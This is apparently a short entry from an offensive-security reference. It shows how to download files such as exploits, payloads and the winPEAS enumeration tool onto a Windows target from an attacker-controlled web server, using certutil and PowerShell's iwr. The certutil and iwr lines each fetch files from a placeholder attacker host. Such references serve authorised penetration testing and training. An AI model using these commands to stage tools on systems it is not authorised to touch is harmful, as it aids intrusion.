← Back to search

Download Files to Windows with certutil / iwr

Pivoting & Transferwindowstool

Summary

Transfers files onto a Windows target from your attacker HTTP server using the built-in certutil (cmd) or Invoke-WebRequest (PowerShell).

Walkthrough

Two living-off-the-land ways to pull files (tools, exploits, payloads) onto a Windows host from a web server you control.

Steps

  1. Host the file on your attacker box (e.g. python3 -m http.server 80).
  2. On the target, download it with whichever shell you have:
  • cmdcertutil with -urlcache -split -f and a local destination path:

``cmd certutil -urlcache -split -f http://<IP>/file.exe C:\Users\Public\file.exe ``

  • PowerShelliwr (Invoke-WebRequest) writing to a local file:

``powershell iwr http://<IP>/winPEASany.exe -outfile winPEASany.exe ``

Commands

cmd

certutil -urlcache -split -f http://<IP>/file.exe C:\Users\Public\file.exe

powershell

iwr http://<IP>/winPEASany.exe -outfile winPEASany.exe